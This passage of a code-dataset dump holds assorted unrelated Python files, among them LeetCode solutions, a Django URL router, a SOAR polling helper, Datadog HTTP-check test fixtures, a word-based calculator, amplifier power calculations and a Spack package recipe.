1)\n                op.pop(k)\n            else:\n                k += 1\n\n        k = 0\n        while k != len(op):\n            o = op[k]\n            if o == \"+\":\n                number[k] = number[k] + number[k + 1]\n            if o == \"-\":\n                number[k] = number[k] - number[k + 1]\n            number.pop(k + 1)\n            op.pop(k)\n\n        return number[0]\n\n\nclass Solution(object):\n\n    # Version B\n    # Simplified stack: calculate * and / on the run, then finish with + and -\n    # This is 10 times faster and matches the speed of the standard answer\n    def calc(self, n1, op, n2):\n        \"\"\"\n        n1, n2 will be numbers\n        op will be an operator string\n        \"\"\"\n        if op == \"*\":\n            return n1 * n2\n        if op == \"/\":\n            return n1 // n2\n        if op == \"+\":\n            return n1 + n2\n        if op == \"-\":\n            return n1 - n2\n\n    def calculate(self, s: str) -> int:\n        n = \"0123456789\"\n        op = []\n        number = []\n        priority = False\n\n        temp = \"\"\n        for i in s:\n            if i in n:\n                temp += i\n            elif i in \"+-\":\n                number.append(int(temp))\n                op.append(i)\n                temp = \"\"\n\n                # when meeting the next + or - operator, condense all previous stack entries into one number\n                while len(number) >= 2:\n                    number.append(self.calc(number.pop(-2), op.pop(-2), number.pop()))\n                priority = False\n\n            elif i in \"*/\":\n                number.append(int(temp))\n                op.append(i)\n                temp = \"\"\n                # when meeting the next * or / operator, only calculate if the previous operator was also * or /\n                # Otherwise, hold for priority\n                if priority and len(number) >= 2:\n                    number.append(self.calc(number.pop(-2), op.pop(-2), number.pop()))\n                priority = True\n\n        number.append(int(temp))\n        while len(number) >= 2:\n            number.append(self.calc(number.pop(-2), op.pop(), number.pop()))\n\n        return number[-1]\n\n\nclass Solution(object):\n\n    # STD ans, this will include the use of \"()\"\n    # @param {string} s\n    # @return {integer}\n\n    # This modifies the stacks directly by removing the top two items and appending the calculated result\n    def compute(self, operands, operators):\n        left, right = operands.pop(), operands.pop()\n        op = operators.pop()\n        if op == \"+\":\n            operands.append(left + right)\n        elif op == \"-\":\n            operands.append(left - right)\n        elif op == \"*\":\n            operands.append(left * right)\n        elif op == \"/\":\n            operands.append(left // right)\n\n    def calculate(self, s: str) -> int:\n        operands, operators = [], []\n        operand = \"\"\n        for i in reversed(range(len(s))):\n            elem = s[i]\n            if elem.isdigit():\n                operand += elem\n                if i == 0 or not s[i - 1].isdigit():\n                    operands.append(int(operand[::-1]))\n                    operand = \"\"\n            elif elem == \")\" or elem == \"*\" or elem == \"/\":\n                operators.append(s[i])\n            elif elem == \"+\" or elem == \"-\":\n                while operators and \\\n                        (operators[-1] == \"*\" or operators[-1] == \"/\"):\n                    
self.compute(operands, operators)\n                operators.append(elem)\n            elif elem == \"(\":\n                while operators[-1] != \")\":\n                    self.compute(operands, operators)\n                operators.pop()\n\n        while operators:\n            self.compute(operands, operators)\n\n        return operands[-1]\n\n\nif __name__ == \"__main__\":\n    assert Solution().calculate(\"3+2*2\") == 7, \"Example 1\"\n    assert Solution().calculate(\" 3/2 \") == 1, \"Example 2\"\n    assert Solution().calculate(\" 3+5 / 2 \") == 5, \"Example 3\"\n    assert Solution().calculate(\"282-1*2*13-30-2*2*2/2-95/5*2+55+804+3024\") == 4067, \"Additional 1\"\n    # assert Solution().calculate(\"(3-1)*(4-1)\") == 6, \"Additional 2\"\n\n    print(\"All passed\")\n","sub_path":"LeetCode/LC227_basic_calculator_ii.py","file_name":"LC227_basic_calculator_ii.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"624571801","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom .views import AppointmentViewSet, PatientViewSet, PatientAppointmentViewSet\n\n# Routers provide an easy way of automatically determining the URL conf.\n# https://www.django-rest-framework.org/api-guide/routers/#api-guide\n\nrouter = routers.DefaultRouter()\nrouter.register(r\"appointments\", AppointmentViewSet)\nrouter.register(r\"patients\", PatientViewSet)\nrouter.register(r\"patientappointments\",PatientAppointmentViewSet)\n\n# Wire up our API using automatic URL routing.\nurlpatterns = [\n    path(\"\", include(router.urls), name=\"appointment-booking\"),\n]\n","sub_path":"backend/appointment_booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470146299","text":"# 1021 / calculate the minimum number of rotations needed to pop the target numbers\nfrom collections import deque\n\nn, m = map(int, input().split())\nts = deque(map(int, input().split()))  # target numbers\n\nres = 0\nqueue = deque(range(1, n + 1))\nwhile len(ts) > 0:\n    if ts[0] == queue[0]:  # if the target number can be popped\n        queue.popleft()\n        ts.popleft()\n    else:  # rotate numbers\n        idx = queue.index(ts[0])\n        if idx <= len(queue) // 2:\n            queue.rotate(-idx)\n            res += idx\n        else:\n            queue.rotate(len(queue) - idx)\n            res += len(queue) - idx\nprint(res)\n","sub_path":"queue/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"650718255","text":"# Implement the function listar_pesos, which returns the weight history for a given person.\n# It must validate:\n#     - that the given person ID exists (reusing the functions already implemented).\n\n# It must return:\n# - A list of (date, weight) tuples, where the date is represented in the following format: YYYY-MM-DD.\n# Example:\n#  [\n#     ('2018-01-01', 80),\n#     ('2018-02-01', 85),\n#     ('2018-03-01', 87),\n#     ('2018-04-01', 84),\n#     ('2018-05-01', 82),\n#  ]\n# - False if any validation fails.\n\n\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\n\n\nfrom practico_03A.ejercicio_02 import insertarReg\nfrom practico_03A.ejercicio_01 import engine\nfrom practico_03A.ejercicio_06 import PersonaPeso, reset_tabla\nfrom practico_03A.ejercicio_07 import agregar_peso\n\nfrom practico_03A.ejercicio_04 import buscar_persona\n\n\nSession = sessionmaker(bind = engine)\nsession = Session()\n\ndef listar_pesos(idPersona):\n    res = buscar_persona(idPersona)\n    
lista=[]\n    if res != False:\n\n        result = session.query(PersonaPeso).filter(PersonaPeso.idPersona == idPersona).all()\n\n        for i in result:\n            aux = i.fecha\n            lista.append(tuple([str(aux), i.peso]))\n        return lista\n    else:\n        return False\n\n\n\n@reset_tabla\ndef pruebas():\n    id_juan = insertarReg('juan perez', datetime.date(1988, 5, 15), 32165498, 180)\n    agregar_peso(id_juan, datetime.date(2018, 5, 1), 80)\n    agregar_peso(id_juan, datetime.date(2018, 6, 1), 85)\n    pesos_juan = listar_pesos(id_juan)\n    pesos_esperados = [\n        ('2018-05-01', 80),\n        ('2018-06-01', 85),\n    ]\n    assert pesos_juan == pesos_esperados\n    # invalid id\n    assert listar_pesos(200) == False\n\n\nif __name__ == '__main__':\n    pruebas()\n\n","sub_path":"practico_03A/ejercicio_08.py","file_name":"ejercicio_08.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263884218","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n# (c) Copyright IBM Corp. 2010, 2022. All Rights Reserved.\nimport functools\nfrom threading import Event\nfrom datetime import datetime\nfrom logging import getLogger\nfrom traceback import format_exc\nfrom resilient import SimpleHTTPException\n\nLOG = getLogger(__name__)\n\n# P O L L E R   L O G I C\ndef poller(named_poller_interval, named_last_poller_time, package_name):\n    \"\"\"\n    Decorator for a poller: manages the poller timing and calls the customized method for getting the next entities\n    :param named_poller_interval: (str) Name of instance variable containing the poller interval in seconds\n    :param named_last_poller_time: (str) Name of instance variable containing the last poller time (a datetime)\n    :param package_name: (str) Name of package for logging\n    \"\"\"\n    def poller_wrapper(func):\n        # Decorator for running a function forever, passing the ms timestamp of\n        # when the poller last ran to the function it's calling\n        @functools.wraps(func)\n        def wrapped(self):\n            last_poller_time = getattr(self, named_last_poller_time)\n            exit_event = Event()\n\n            while not exit_event.is_set():\n                try:\n                    LOG.info(u\"%s polling start.\", package_name)\n                    poller_start = datetime.now()\n                    # Function execution with the last poller time in ms\n                    func(self, last_poller_time=int(last_poller_time.timestamp()*1000))\n\n                except Exception as err:\n                    LOG.error(str(err))\n                    LOG.error(format_exc())\n                finally:\n                    LOG.info(u\"%s polling complete.\", package_name)\n                    # Set the last poller time for next cycle\n                    last_poller_time = poller_start\n\n                    # Sleep before the next poller execution\n                    exit_event.wait(getattr(self, named_poller_interval))\n            exit_event.set() # Loop complete\n\n        return wrapped\n    return poller_wrapper\n\nclass SOARCommon():\n    \"\"\" Common methods for accessing IBM SOAR cases and their entities: comment, attachments, etc. 
\"\"\"\n\n    @staticmethod\n    def get_open_soar_cases(search_fields, rest_client, open_cases=True):\n        \"\"\"\n        Find all IBM SOAR cases which are associated with the endpoint platform\n        :param search_fields: (dict) Field(s) used to track the relationship with a SOAR case\n            field values can be True/False for 'has_a_value' or 'does_not_have_a_value'\n            Otherwise a field will use 'equals' for the value\n            NOTE: search_fields only supports custom fields\n        :return soar_cases: (list) Returned list of cases\n        :return error_msg: (str) Any error during the query or None\n        \"\"\"\n        query = SOARCommon._build_search_query(search_fields, open_cases=open_cases)\n\n        try:\n            return rest_client.post('/incidents/query?return_level=normal', query), None\n        except SimpleHTTPException as err:\n            LOG.error(str(err))\n            LOG.error(query)\n            return None, str(err)\n\n    @staticmethod\n    def _build_search_query(search_fields, open_cases=True):\n        \"\"\"\n        Build the json structure needed to search for cases\n        :param search_fields: (dict/list) Key/value pairs to search custom fields with specific values.\n            If a value contains \"*\" then a search is used with 'has_a_value'\n            NOTE: search_fields works on custom fields\n        :return query_string: (dict) json structure used for case searches\n        \"\"\"\n        query = {\n            \"filters\": [{\n                \"conditions\": [\n                ]\n            }],\n            \"sorts\": [{\n                \"field_name\": \"create_date\",\n                \"type\": \"desc\"\n            }]\n        }\n\n        if open_cases:\n            field_search = {\n                \"field_name\": \"plan_status\",\n                \"method\": \"equals\",\n                \"value\": \"A\"\n            }\n            query['filters'][0]['conditions'].append(field_search)\n\n        if isinstance(search_fields, dict):\n            for search_field, search_value in search_fields.items():\n                field_search = {\n                    \"field_name\": \"properties.{0}\".format(search_field)\n                }\n                if isinstance(search_value, bool):\n                    field_search['method'] = \"has_a_value\" if search_value else \"does_not_have_a_value\"\n                else:\n                    field_search['method'] = \"equals\"\n                    field_search['value'] = search_value\n\n                query['filters'][0]['conditions'].append(field_search)\n\n        return query\n","sub_path":"fn_qradar_enhanced_data/fn_qradar_enhanced_data/lib/poller_common.py","file_name":"poller_common.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19076999","text":"# (C) Datadog, Inc. 
2018-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\nimport sys\n\nimport pytest\nfrom mock import patch\n\nfrom datadog_checks.dev import docker_run, run_command\nfrom datadog_checks.dev.utils import ON_WINDOWS\nfrom datadog_checks.http_check import HTTPCheck\n\nfrom .common import CONFIG_E2E, HERE\n\nMOCKED_HOSTS = ['valid.mock', 'expired.mock', 'wronghost.mock', 'selfsigned.mock']\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n cacert_path = os.path.join(HERE, 'fixtures', 'cacert.pem')\n e2e_metadata = {'docker_volumes': ['{}:/opt/cacert.pem'.format(cacert_path)]}\n with docker_run(\n os.path.join(HERE, 'compose', 'docker-compose.yml'), build=True, log_patterns=[\"starting server on port\"]\n ):\n yield CONFIG_E2E, e2e_metadata\n\n\n@pytest.fixture(scope='session')\ndef mock_dns():\n import socket\n\n _orig_getaddrinfo = socket.getaddrinfo\n _orig_connect = socket.socket.connect\n\n def patched_getaddrinfo(host, *args, **kwargs):\n if host.endswith('.mock'):\n # See socket.getaddrinfo, just updating the hostname here.\n # https://docs.python.org/3/library/socket.html#socket.getaddrinfo\n return [(2, 1, 6, '', ('127.0.0.1', 443))]\n\n return _orig_getaddrinfo(host, *args, **kwargs)\n\n def patched_connect(self, address):\n host, port = address[0], address[1]\n if host.endswith('.mock'):\n host, port = '127.0.0.1', 443\n\n return _orig_connect(self, (host, port))\n\n socket.getaddrinfo = patched_getaddrinfo\n socket.socket.connect = patched_connect\n yield\n socket.getaddrinfo = _orig_getaddrinfo\n socket.socket.connect = _orig_connect\n\n\n@pytest.fixture()\ndef mock_hosts_e2e():\n \"\"\"Only for e2e testing\"\"\"\n container_id = \"dd_http_check_{}\".format(os.environ[\"TOX_ENV_NAME\"])\n commands = []\n for mocked_host in MOCKED_HOSTS:\n commands.append(r'bash -c \"printf \\\"127.0.0.1 {}\\n\\\" >> /etc/hosts\"'.format(mocked_host))\n\n for command in commands:\n run_command('docker exec {} {}'.format(container_id, command))\n\n\n@pytest.fixture(scope='session')\ndef http_check():\n # Patch the function to return the certs located in the `tests/` folder\n with patch('datadog_checks.http_check.http_check.get_ca_certs_path', new=mock_get_ca_certs_path):\n yield HTTPCheck('http_check', {}, [{}])\n\n\n@pytest.fixture(scope='session')\ndef embedded_dir():\n if ON_WINDOWS:\n return 'embedded{}'.format(sys.version_info[0])\n else:\n return 'embedded'\n\n\ndef mock_get_ca_certs_path():\n \"\"\"\n Mimic get_ca_certs_path() by using the certificates located in the `tests/` folder\n \"\"\"\n embedded_certs = os.path.join(HERE, 'fixtures', 'cacert.pem')\n\n if os.path.exists(embedded_certs):\n return embedded_certs\n\n raise Exception(\"Embedded certs not found: {}\".format(embedded_certs))\n","sub_path":"http_check/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"448371213","text":"\"\"\"\nTravis Robinson\nOregon State\nComputer Science\ntravisrobinson2006@gmail.com\nrobitrav@oregonstate.edu\n\"\"\"\n\n\"\"\"\nCalculator module for Victoria. 
Contains functions for converting numbers as text to numbers, as well as doing the calculations that are needed\n\"\"\"\n\n#import modules\nimport math\nfrom collections import deque\n\n#operators--made global so it can be referenced by other modules--operators_english used as part of converting from text to math-ready values--'end' is a flag signaling termination of\n#the equation\noperators = ['+','-','x','/','end']\noperators_english1 = ['plus','minus','times','divide']\noperators_english2 = ['add','subtract','multiply','divided']\noperators_english = [operators_english1,operators_english2]\n\nscale_units = ['thousand','million','billion','trillion','quadrillion']\n\n\"\"\"\nDescription: receives a list containing ints and words, converts it into a single value\nInput: a number as a mix of ints and strings (ie 6 \"billion\")\nOutput: a single value (ie 6000000000)\nNote: Found that the speech recognizer has numbers as strings, not ints (\"6\", not 6)--this should be rewritten to take care of converting \"6\" to 6--as it stands this is done in the calling function\n\"\"\"\ndef word_to_num(word):\n    invalid_number = result_negative = 0 #flags used to check for negative or invalid numbers\n    current = 0 #use this to hold input digits to multiply by scale values (million, billion, etc); add to result after this is done\n    result = 0 #accumulator for final result\n\n    for i in word:\n        if word.index(i)==(len(word)-1) and isinstance(i,(int,long)):#if last number, add it to result; case where number doesn't end in 0 (ie last word entered is not million, etc)\n            result = result+i\n        elif isinstance(i,(int,long)) and current != 0:\n            return \"invalidNumber\"\n        elif isinstance(i,(int,long)):\n            current = i\n        elif i in scale_units:\n            current = current*math.pow(10,(scale_units.index(i)+1)*3) #multiply current value by scale value, determined by the location of the scale word in the list\n            result = result + current #add current to result and reset--do here so as not to add the scale coefficient to result\n            current = 0\n        elif word.index(i) == 0 and i == 'negative': #check to see if negative flag needs setting\n            result_negative = 1\n        else:\n            return \"invalidNumber\"\n    if result_negative == 1:\n        result = result * -1\n    return result\n\n\n\"\"\"\nDescription: converts a user-given infix expression to postfix\nInput: an equation using infix notation\nOutput: an equation using postfix notation\n\"\"\"\ndef infix_to_postfix(equation):\n    marker_begin = marker_end = 0\n    stack = []\n    postfix = deque([])\n#    operators = ['+','-','*','/','sqrt','end']\n    equation.append('end')#used to mark the end of the list, retrieving proper values\n    for i in equation:#convert to postfix\n        if i in operators or equation.index(i)+1 == len(equation):#sort through using operators as a delimiter from converting values\n            postfix.append(word_to_num(equation[marker_begin:marker_end]))#append to postfix the number converted from a list of strings to a single value\n            if len(stack) == 0:#if the stack is empty the operator goes on\n                stack.append(i)\n            elif operators.index(stack[-1]) > operators.index(i):#affix operators in correct order using pemdas--pop higher tier operators from stack to postfix before placing lower tier on stack\n                postfix.append(stack[-1])\n                stack.pop()\n                stack.append(i)\n            else:#lower tier operator stays on stack, higher tier placed on top\n                stack.append(i)\n            marker_begin = equation.index(i)+1\n            marker_end = marker_begin\n        else:#adjust marker so we know what words to send to word_to_num\n            marker_end = marker_end + 1\n    stack.pop() #remove end marker from stack\n    while 
len(stack) != 0:\n postfix.append(stack[-1])\n stack.pop()\n return postfix\n\n\"\"\"\nDescription: solves postfix equations\nInput: a postfix equation\nOutput: an answer\n\"\"\"\ndef solve_postfix(postfix):\n stack = []\n while len(postfix) != 0:#solve postfix,go through pushing values onto stack--when operator found, remove top two values and apply operator, pushing result onto stack\n if postfix[0] == '+':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one+val_two)\n elif postfix[0] == '-':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n# print val_one\n # print val_two\n stack.append(val_one-val_two)\n elif postfix[0] == 'x':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one*val_two)\n elif postfix[0] == '/':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one/val_two)\n else:\n stack.append(postfix[0])\n postfix.popleft()\n return stack[0]#stack at end will only contain final value, return as number\n\n\"\"\"\nDescription: wrapper function, accepts an equation from user, solves it\nInput: an infix equation full of words\nOutput: the value of the equation\n\"\"\"\ndef calculate(equation):\n return solve_postfix(infix_to_postfix(equation))\n","sub_path":"calculator_lib_files/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215870508","text":"def insertion_sort(arr):\n length = len(arr)\n i = 1\n while i < length:\n anchor = arr[i]\n j = i -1\n while j >= 0 and anchor < arr[j]:\n arr[j+1] = arr[j]\n j = j-1\n arr[j+1] = anchor\n i += 1\n return arr\n\narr = [12,43,12,34,23,56,32,41,45,24,64,57,97,35]\n\nprint(arr)\nresult = insertion_sort(arr)\nprint(result)","sub_path":"Insertion_sort.py","file_name":"Insertion_sort.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536456844","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfilename = \"Motor_Vehicle_Crashes_-_Vehicle_Information__Three_Year_Window.csv\"\nwith open(filename) as f:\n reader = csv.reader(f)\n head_row = next(reader)\n\n crash_dic = {}\n for row in reader:\n if row[4] in crash_dic:\n crash_dic[row[4]] += 1\n else:\n crash_dic[row[4]] = 1\n\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\nfig, ax = plt.subplots()\nn = len(crash_dic)\nx = np.linspace(5, 200, n)\n\nax.bar(x, crash_dic.values())\nax.set_xticks(x)\nax.set_xticklabels(crash_dic.keys(), rotation=20)\n\nplt.show()\n\n","sub_path":"csv/crash.py","file_name":"crash.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"89829663","text":"# Reading the inputs\nn = int(input())\nk = int(input())\n\n# Function\ndef pattern(n,dif=k,final=n):\n if n<=0:\n print(n,end=\", \")\n else:\n print(n,end=\", \")\n pattern(n-dif)\n if final==n:\n print(n)\n else:\n print(n,end=\", \")\n # Write your recursive function here\npattern(n,k)","sub_path":"PythonModule2/Recursive Pattern/rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"456937913","text":"\n# coding: utf-8\n\n# In[2]:\n\n#amp params\nspeakers_impedance = 8 #ohms\ntarget_output_power = 40 # watts\n\n#LM3886 - consult with datasheet\namp_voltage_drop = 4\nmax_supply_voltage_pp = 84 #V |Vcc|+|Vee|\nsafety_margin = 0.90 # 10 %\npassive_current = 0.085 # A\n\n#trafo regulation\nvariation_in_main = 1.1\ntrafo_regulation = 1.06\ntrafo_v_rms_out = 24\ntrafo_v_peak_out = trafo_v_rms_out * 1.41 #V\n\nimport math\nv_pk_output = math.sqrt(2*speakers_impedance*target_output_power)\nprint(\"Maximum output signal voltage:\\t{0:.2f}V\".format(v_pk_output))\nrequired_voltage = (v_pk_output + amp_voltage_drop) * trafo_regulation * 1.1\n\nprint(\"Required supply voltage:\\t{0:.2f}V\".format(required_voltage))\nprint(\"Trafo output peak voltage:\\t{0:.2f}V\".format(trafo_v_peak_out))\n\nmax_supply_voltage =(max_supply_voltage_pp/2) * safety_margin\n\nprint(\"Max allowed supply voltage:\\t{0:.2f}V\".format(max_supply_voltage))\nif(max_supply_voltage < trafo_v_peak_out):\n    print(\"Trafo output voltage is too big!\")\n\n\nv = (trafo_v_peak_out/(trafo_regulation * variation_in_main) - amp_voltage_drop)\nprint(\"\\n\",v)\nactual_power = (v*v)/speakers_impedance/2\n\nprint(\"\\nMax output power (Rout={0}ohms):\\t{1:.0f}W\".format(speakers_impedance, actual_power))\n\n# Required trafo power calculation\n\nout_current_load_max = v_pk_output/3.14/speakers_impedance\nout_current_total = passive_current + out_current_load_max\n\np_supply = 2*trafo_v_peak_out * out_current_total\n\nprint(\"Required power per channel:\\t{:.2f}W\".format(p_supply))\np_sup_marg = p_supply*1.5\nprint(\" --- with margin:\\t{:.2f}W\".format(p_sup_marg))\nva_ratings = p_sup_marg*2\nprint(\" --- total:\\t\\t{:.2f}W\".format(va_ratings))\n\nprint(\"\\n### TRAFO PARAMS ###\")\nprint(\"Out voltage:\\t2*{0:.2f}\\nVA rating:\\t{1:.2f}\".format(trafo_v_rms_out, va_ratings))\n\n\n# In[7]:\n\ni_vol_rms = 0.316#V\ni_vol_a = 1.41 * 0.316\nv_in_max = 2*i_vol_a\n\nprint(i_vol_rms, i_vol_a, v_in_max) # the original printed an undefined i_vol_pp; v_in_max holds the peak-to-peak input voltage\n\nv_out_max = math.sqrt(actual_power * speakers_impedance)\nprint(v_out_max)\n\nmin_gain = v_out_max/v_in_max\n\nprint(\"Minimum gain required: {0:.2f}\".format(min_gain))\n","sub_path":"amp-01/scripts/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527718505","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGRead controller\n\"\"\"\nfrom PyQt4.QtCore import QObject, Qt, QTimer, SIGNAL\nfrom PyQt4.QtGui import QApplication\n\nfrom ..basic.controller import Controller as BasicController\n\nfrom feedlist import FeedListView\nfrom itemlist import ItemListView\nfrom itemview import ItemViewView\nfrom settings_dialog import SettingsDialog\n\nfrom engine import settings\n\nclass Controller(BasicController):\n    \n    def __init__(self, *args, **kwargs):\n        super(Controller, self).__init__(*args, **kwargs)\n\n        # manage orientation\n        self.portrait_mode = False\n        self.set_portrait_mode(settings.get('other', 'portrait_mode'))\n\n        # manage scrolling titles\n        self.title_timer = QTimer()\n        QObject.connect(self.title_timer, SIGNAL(\"timeout()\"), self.timeout_title_timer)\n        \n    def create_views(self):\n        \"\"\"\n        Create all the views used by the application\n        \"\"\"\n        self.settings_dialog = SettingsDialog(controller=self)\n        self.feedlist_view = FeedListView(controller=self)\n        self.itemlist_view = ItemListView(controller=self)\n        self.itemview_view = ItemViewView(controller=self)\n\n    def 
settings_updated(self, *args, **kwargs):\n        self.set_portrait_mode(settings.get('other', 'portrait_mode'))\n        super(Controller, self).settings_updated(*args, **kwargs)\n\n    def manage_orientation(self):\n        \"\"\"\n        Manage the application orientation mode\n        \"\"\"\n        for view in self.views:\n            try:\n                view.manage_orientation()\n            except:\n                pass\n\n    def set_portrait_mode(self, portrait_mode):\n        if portrait_mode == self.portrait_mode:\n            return\n        self.portrait_mode = portrait_mode\n        self.manage_orientation()\n        \n    def get_title_operations_part(self):\n        \"\"\"\n        Get the part of the title which will handle the running operations counter\n        \"\"\"\n        nb = self.account.operations_manager.count_running()\n        if nb:\n            return \"%d\" % nb\n        else:\n            return \"\"\n","sub_path":"src/views/maemo5/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"32194950","text":"\"\"\"Shortest connection of multiple points in a plane.\n\nAt each step, compute the distances from every connected point to every unconnected point, and connect the shortest one.\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.random.seed(19950901)\nn = 100\nx_low, x_high, y_low, y_high = 0, 100, 0, 100\n\n\ndef shortest_lines(points: list) -> list:\n    \"\"\"Find the shortest set of connecting lines\"\"\"\n    outs = {i: p for i, p in enumerate(points)}  # points not yet connected\n    ins = {0: outs.pop(0)}  # points already connected\n    lines = []  # connecting lines\n\n    def dist(point1, point2):\n        \"\"\"Compute the (squared) distance between two points\"\"\"\n        return np.sum((point1 - point2) ** 2)\n\n    while outs:\n        # find the shortest edge\n        p0, p1, ko, ki = min(\n            (\n                (out_p, in_p, ko, ki)\n                for ko, out_p in outs.items() for ki, in_p in ins.items()\n            ),\n            key=lambda p: dist(p[0], p[1])\n        )\n        ins[ko] = outs.pop(ko)\n        lines.append((ki, ko))\n\n    return lines\n\n\ndef plot(points: list, lines: list):\n    \"\"\"Plot the connections\"\"\"\n    for l in lines:\n        p1, p2 = points[l[0]], points[l[1]]\n        xs, ys = [p1[0], p2[0]], [p1[1], p2[1]]\n        plt.plot(xs, ys, marker='o')\n    plt.show()\n\n\ndef main():\n    points = [\n        np.array([\n            np.random.randint(x_low, x_high),\n            np.random.randint(y_low, y_high)\n        ])\n        for _ in range(n)\n    ]\n    lines = shortest_lines(points)\n    plot(points, lines)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"shortest_line.py","file_name":"shortest_line.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"204666694","text":"# Definition for singly-linked list.\n#class ListNode:\n#    def __init__(self, x):\n#        self.val = x\n#        self.next = None\n\nclass Solution:\n\n    def find_kth_node(self, head, k): #k : 0 to len-1\n        ptr = head\n        for _ in xrange(k):\n            ptr = ptr.next\n        return ptr\n\n    # @param head, a ListNode\n    # @param k, an integer\n    # @return a ListNode\n    def rotateRight(self, head, k):\n        if (not head):\n            return None\n        len = 1\n        ptr = head\n        while (ptr.next):\n            ptr = ptr.next\n            len += 1\n        ptr.next = head\n        new_tail = self.find_kth_node(head, -(k+1) % len)\n        new_head = new_tail.next\n        new_tail.next = None\n        return new_head\n","sub_path":"lc/prob_61.py","file_name":"prob_61.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11007916","text":"from spack import *\nimport sys,os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))\nfrom scrampackage import write_scram_toolfile\n\n\nclass UuidToolfile(Package):\n    url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'\n    version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)\n    if sys.platform == 
'darwin':\n depends_on('libuuid')\n else:\n depends_on('uuid-cms')\n\n def install(self, spec, prefix):\n values = {}\n if sys.platform == 'darwin':\n values['VER'] = spec['libuuid'].version\n values['PFX'] = spec['libuuid'].prefix\n else:\n values['VER'] = spec['uuid-cms'].version\n values['PFX'] = spec['uuid-cms'].prefix\n fname = 'uuid-cms.xml'\n contents = str(\"\"\"\n \n \n \n \n \n \n \n \n \n\"\"\")\n write_scram_toolfile(contents, values, fname, prefix)\n","sub_path":"packages/uuid-toolfile/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643400281","text":"# Daniel Chen\n# Double Dice\n# 1 April 2019\n\nrounds = int(input('Rounds: '))\n\nplayer1 = 100\nplayer2 = 100\n\nfor x in range(rounds):\n bothplayers = input('Round ' + str(x + 1) + ': ')\n player1score = int(bothplayers[0])\n player2score = int(bothplayers[2])\n if player1score > player2score:\n player2 = player2 - player1score\n elif player2score > player1score:\n player1 = player1 - player2score\n\nprint(player1)\nprint(player2)\n ","sub_path":"Scripting/doubledice.py","file_name":"doubledice.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"257203679","text":"#!/usr/bin/env python3\nimport itertools\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\n\nALGORITHMS = {\"1\", \"2\"}\n# 1: sorted by flow to node\n# 2: incremental shaving by flow to node\n\n\ndef _get_flow_graph(graph):\n \"\"\"\n :param graph: square matrix representing graph\n :type graph: scipy.sparse.csr_matrix\n :return: square matrix representing flow graph\n :rtype: scipy.sparse.lil_matrix\n \"\"\"\n # calculate full squared matrix\n flow_matrix = graph * graph\n\n # covert to LIL so zeroing the diagonal is more efficient\n flow_graph = flow_matrix.tolil()\n\n # zero the diagonal, since nodes should not have flow with themselves\n for i in range(graph.shape[0]):\n flow_graph[i, i] = 0\n\n return flow_graph\n\n\ndef get_density_sorted_cluster(nodes, edges, algo):\n 